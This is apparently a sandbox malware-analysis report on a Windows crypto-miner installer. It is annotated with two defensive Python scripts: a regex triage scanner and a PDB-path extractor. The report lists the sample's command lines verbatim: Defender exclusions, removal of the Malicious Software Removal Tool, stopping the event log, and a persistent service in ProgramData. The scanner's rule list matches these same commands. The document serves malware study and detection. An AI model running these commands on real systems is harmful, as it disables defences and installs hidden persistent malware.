Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:1564:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:1148:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:5656:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:3160:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:2616:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3icsgac.p4c.ps1
Source: 4o8Tgrb384.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\svchost.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\svchost.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" (this query appears 15 times in the report)
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 4o8Tgrb384.exeReversingLabs: Detection: 63%
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeFile read: C:\Users\user\Desktop\4o8Tgrb384.exeJump to behavior
Source: unknown | Process created: C:\Users\user\Desktop\4o8Tgrb384.exe "C:\Users\user\Desktop\4o8Tgrb384.exe"
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "QVYJPHJR"
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "QVYJPHJR"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | Process created: C:\Windows\System32\svchost.exe svchost.exe
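The process-creation chain above is the installer routine, run once by the original sample and again by its ProgramData copy: a Defender exclusion for the user profile and ProgramData plus every .exe, removal of KB890830 (the Malicious Software Removal Tool) through wusa, four powercfg calls that zero the standby and hibernate timeouts so the miner keeps running, an `sc stop eventlog`, a service named QVYJPHJR whose binary lives under C:\ProgramData, and finally a bare `svchost.exe` child that the later WMI queries come from. None of these commands is unusual on its own; the combination from one parent is. The following triage script is an added example and not part of the Joe Sandbox report: it runs the command lines copied from the report through rule matches and counts techniques per parent. The technique labels and the final benign `powercfg /query` control record are this example's own.

```python
import re
from dataclasses import dataclass

# Process-creation records copied from the report above as (parent image, command line).
# The last record is a constructed benign control line and does not appear in the report.
REPORT_PROCESS_EVENTS = [
    (r"C:\Users\user\Desktop\4o8Tgrb384.exe",
     r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference "
     r"-ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    (r"C:\Users\user\Desktop\4o8Tgrb384.exe",
     r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (r"C:\Users\user\Desktop\4o8Tgrb384.exe", r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"),
    (r"C:\Users\user\Desktop\4o8Tgrb384.exe", r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0"),
    (r"C:\Users\user\Desktop\4o8Tgrb384.exe", r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"),
    (r"C:\Users\user\Desktop\4o8Tgrb384.exe", r"C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0"),
    (r"C:\Users\user\Desktop\4o8Tgrb384.exe", r'C:\Windows\system32\sc.exe delete "QVYJPHJR"'),
    (r"C:\Users\user\Desktop\4o8Tgrb384.exe",
     r'C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto"'),
    (r"C:\Users\user\Desktop\4o8Tgrb384.exe", r"C:\Windows\system32\sc.exe stop eventlog"),
    (r"C:\Users\user\Desktop\4o8Tgrb384.exe", r'C:\Windows\system32\sc.exe start "QVYJPHJR"'),
    (r"C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe", r"svchost.exe"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\system32\powercfg.exe /query"),  # constructed, benign
]

# (technique label, pattern). Labels are this example's own names, not Joe Sandbox signatures.
RULES = [
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Extension|Process)", re.I)),
    ("mrt_removal",  # KB890830 is the Malicious Software Removal Tool
     re.compile(r"wusa(\.exe)?\s+/uninstall\s+/kb:890830", re.I)),
    ("power_sleep_disabled",  # any standby/hibernate timeout forced to 0 on AC or DC
     re.compile(r"powercfg(\.exe)?\s+[/-](x|change)\s+-?(standby|hibernate)-timeout-(ac|dc)\s+0\b", re.I)),
    ("eventlog_stopped",
     re.compile(r"\bsc(\.exe)?\s+(stop|config)\s+eventlog\b", re.I)),
    ("service_from_writable_dir",  # service binary under ProgramData, Windows\Temp or a user's AppData
     re.compile(r'\bsc(\.exe)?\s+create\s+.*binpath=\s*"?[a-z]:\\(programdata|windows\\temp|users\\[^\\"]+\\appdata)\\', re.I)),
]


@dataclass(frozen=True)
class Finding:
    technique: str
    parent: str
    cmdline: str


def classify(parent, cmdline):
    """Technique labels triggered by one process-creation record."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    # A bare "svchost.exe" launched by anything other than services.exe hosts no service;
    # in this report it is the process the miner's WMI queries are issued from.
    if cmdline.strip().lower() == "svchost.exe" and not parent.lower().endswith("\\services.exe"):
        hits.append("unexpected_svchost_child")
    return hits


def triage(events):
    return [Finding(t, p, c) for p, c in events for t in classify(p, c)]


def technique_counts(events):
    counts = {}
    for f in triage(events):
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts


def suspicious_parents(events, min_techniques=3):
    """Parents that trigger at least min_techniques distinct labels: the combination,
    not any single command, is what separates this installer from an admin script."""
    per_parent = {}
    for f in triage(events):
        per_parent.setdefault(f.parent, set()).add(f.technique)
    return sorted(p for p, techs in per_parent.items() if len(techs) >= min_techniques)


if __name__ == "__main__":
    for f in triage(REPORT_PROCESS_EVENTS):
        print(f"{f.technique:28} {f.parent} -> {f.cmdline}")
    print("suspicious parents:", suspicious_parents(REPORT_PROCESS_EVENTS))
```

Run as-is it flags nine records and names only the original sample as a parent worth escalating; in a real deployment the same rules would be fed from Sysmon event ID 1 or Security event 4688 command lines rather than from a pasted report.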
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: uxtheme.dll
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wbemcomn.dll (repeated 22 times, one per WMI query)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 4o8Tgrb384.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: 4o8Tgrb384.exe | Static file information: File size 2629632 > 1048576
Source: 4o8Tgrb384.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x277a00
Source: 4o8Tgrb384.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: atpljrtdlbzl.exe, 00000018.00000003.1489405738.000001EB643A0000.00000004.00000001.00020000.00000000.sdmp
Source: 4o8Tgrb384.exe | Static PE information: section name: .00cfg
Source: atpljrtdlbzl.exe.0.dr | Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\4o8Tgrb384.exe | Code function: 0_2_00007FF67C751394 push qword ptr [00007FF67C75B004h]; ret 0_2_00007FF67C751403
Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | Code function: 24_2_00007FF62D5F1394 push qword ptr [00007FF62D5FB004h]; ret 24_2_00007FF62D5F1403
Source: C:\Windows\System32\conhost.exe | Code function: 37_2_0000000140001394 push qword ptr [0000000140009004h]; ret 37_2_0000000140001403
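Two of the static findings above carry more weight than the rest. The WinRing0.pdb path recovered from a memory dump of atpljrtdlbzl.exe points at WinRing0, the helper driver that XMRig bundles so it can program CPU MSRs from user mode, which fits the unsigned .sys the copy later writes to C:\Windows\Temp. And the same `push qword ptr [...]; ret` function appears at offset 0x1394 in the sample, in its ProgramData copy and in conhost.exe at image base 0x140000000, that is, the sample's own code mapped into the conhost.exe it started without arguments, which is the injection the thread-context signature reports. The following is an added example, not part of the Joe Sandbox report: a Python scanner that pulls CodeView PDB70 (RSDS) records out of a file or memory dump, which is how a path like the one quoted is recovered from a dropped driver. The sample bytes, GUID and age are constructed for the example; only the PDB path is taken from the report.

```python
import struct
import uuid

RSDS = b"RSDS"  # CodeView PDB70 signature; record layout: 'RSDS' | GUID | uint32 age | path NUL


def make_cv_record(guid, age, pdb_path):
    """Build one CV_INFO_PDB70 record. The GUID is stored as the Windows GUID struct
    (first three fields little-endian), which is exactly what uuid's bytes_le gives."""
    return RSDS + uuid.UUID(guid).bytes_le + struct.pack("<I", age) + pdb_path.encode("latin-1") + b"\x00"


def extract_pdb_paths(data):
    """Return (guid, age, path) for every PDB70 record found in data.

    A signature scan rather than a debug-directory walk, so it works on a raw memory
    dump (the .sdmp the report quotes) as well as on a PE file on disk."""
    found = []
    pos = data.find(RSDS)
    while pos != -1:
        path_start = pos + 24                      # 4 signature + 16 GUID + 4 age
        nul = data.find(b"\x00", path_start)
        if nul != -1:
            path = data[path_start:nul].decode("latin-1")
            if path.lower().endswith(".pdb"):      # discard chance hits on the 4-byte signature
                guid = str(uuid.UUID(bytes_le=data[pos + 4:pos + 20]))
                age = struct.unpack_from("<I", data, pos + 20)[0]
                found.append((guid, age, path))
        pos = data.find(RSDS, pos + 1)
    return found


def is_winring0_build(data):
    """True if any embedded PDB path names WinRing0, the MSR driver XMRig ships."""
    return any("winring0" in path.lower() for _, _, path in extract_pdb_paths(data))


# Constructed stand-in for the dropped driver: filler bytes around one RSDS record carrying
# the PDB path quoted in the report. The GUID and age are invented for this example.
SAMPLE_DRIVER = (
    b"MZ" + b"\x90" * 48
    + make_cv_record("0b3c4d5e-6f70-4a1b-9c2d-3e4f50617283", 1,
                     r"d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb")
    + b"\x00" * 16
)

if __name__ == "__main__":
    for guid, age, path in extract_pdb_paths(SAMPLE_DRIVER):
        print(f"{guid} age={age} {path}")
    print("WinRing0 build:", is_winring0_build(SAMPLE_DRIVER))
```

Pointed at C:\Windows\Temp\iwttnaazwiuc.sys from a triage image, `extract_pdb_paths(open(path, "rb").read())` answers the question the report leaves open; the GUID and age it returns can be compared against the RSDS record of the WinRing0 build shipped in XMRig releases to tell a stock copy from a rebuilt one.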

              Persistence and Installation Behavior

Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe | File created: C:\Windows\TEMP\iwttnaazwiuc.sys
